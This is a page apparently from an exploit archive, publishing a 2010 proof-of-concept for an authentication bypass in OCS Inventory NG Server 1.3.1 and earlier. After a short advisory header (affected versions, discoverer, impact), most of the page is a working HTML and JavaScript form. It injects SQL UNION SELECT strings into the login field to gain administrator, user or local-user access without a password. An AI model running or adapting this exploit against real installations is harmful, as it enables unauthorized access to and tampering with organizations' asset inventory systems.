Home / exploitsPDF  

OCS Inventory NG Server <= 1.3.1 (login) Remote Authentic

Posted on 06 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>OCS Inventory NG Server &lt;= 1.3.1 (login) Remote Authentication Bypass</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================================
OCS Inventory NG Server &lt;= 1.3.1 (login) Remote Authentication Bypass
=====================================================================

&lt;!--
____________________________________________________________________________________________________
 
OCS Inventory NG Server &lt;= 1.3.1 (login) Remote Authentication Bypass
____________________________________________________________________________________________________
 
 Software       : Open Computer and Software (OCS) Inventory NG
 Download       : http://www.ocsinventory-ng.org/
 Discovered by  : Nicolas DEROUET (nicolas.derouet[gmail]com)
 Discover       : 2010-02-05
 Published      : 2010-02-17
 Version        : 1.3.1 and prior (except 1.02.1 to 1.02.3)
 Impact         : Manipulation of data
 Remote         : Yes (No authentication is needed)
____________________________________________________________________________________________________
 
--&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;OCS Inventory NG &amp;lt;= 1.3.1 (login) Remote Authentication Bypass&lt;/title&gt;
&lt;script&gt;
  function $(id) { return document.getElementById(id); }
  function $$(id) { return $(id).options[$(id).options.selectedIndex].value; }
  function bypass()
  {
    $('log').action = $('ocsreports').value + $$('meth') + '?lang=' + $$('lang');
    if ($$('type') == 0)
      $('login').value = &quot;' UNION SELECT id, accesslvl, '' FROM operators WHERE id='&quot; + $('user').value;
    else
      $('login').value = &quot;' UNION SELECT '&quot; + $('user').value + &quot;', '&quot; + $$('type') + &quot;', '&quot;;
    $('pass').value = &quot;&quot;;
    if ($$('meth') == 'header.php')
      alert('Please go to &quot;' + $('ocsreports').value + '&quot; (or click on the OCS logo) !');
  }
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form name=&quot;log&quot; id=&quot;log&quot; action=&quot;#&quot; method=&quot;post&quot;&gt;
  &lt;table align=&quot;center&quot; border=&quot;0&quot; width=&quot;450px&quot;&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;b&gt;OCSReports :&lt;/b&gt;&lt;/td&gt;
    &lt;td&gt;
      &lt;input type=&quot;text&quot; id=&quot;ocsreports&quot; size=&quot;40&quot; value=&quot;http://127.0.0.1/ocsreports/&quot; /&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;b&gt;Version :&lt;/b&gt;&lt;/td&gt;
    &lt;td&gt;&lt;select id=&quot;meth&quot;&gt;
          &lt;option value=&quot;index.php&quot; selected&gt;&amp;lt;= 1.02 --- 1.3b2 &amp;lt;=&gt; 1.3b3&lt;/option&gt;
          &lt;option value=&quot;header.php&quot;&gt;&amp;lt;= 1.0 (4100) --- 1.3b2 &amp;lt;=&gt; 1.3.1&lt;/option&gt;
        &lt;/select&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;b&gt;Login :&lt;/b&gt;&lt;/td&gt;
    &lt;td&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; size=&quot;40&quot; value=&quot;admin&quot; /&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;b&gt;Type :&lt;/b&gt;&lt;/td&gt;
    &lt;td&gt;&lt;select id='type'&gt;
          &lt;option value=0&gt;Default (if login exists)&lt;/option&gt;
          &lt;option value=1&gt;Administrator&lt;/option&gt;
          &lt;option value=2&gt;User&lt;/option&gt;
          &lt;option value=3&gt;Local user&lt;/option&gt;
        &lt;/select&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;b&gt;Language :&lt;/b&gt;&lt;/td&gt;
    &lt;td&gt;&lt;select id=&quot;lang&quot;&gt;
          &lt;option value=&quot;english&quot; selected&gt;English&lt;/option&gt;
          &lt;option value=&quot;french&quot;&gt;French&lt;/option&gt;
          &lt;option value=&quot;german&quot;&gt;German&lt;/option&gt;
          &lt;option value=&quot;spanish&quot;&gt;Spanish&lt;/option&gt;
        &lt;/select&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;input type=&quot;hidden&quot; name=&quot;login&quot; id=&quot;login&quot; /&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;pass&quot;  id=&quot;pass&quot;  /&gt;&lt;/td&gt;
    &lt;td&gt;&lt;input type=&quot;submit&quot; name=&quot;subLogin&quot; onclick=&quot;bypass();&quot;&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;/table&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :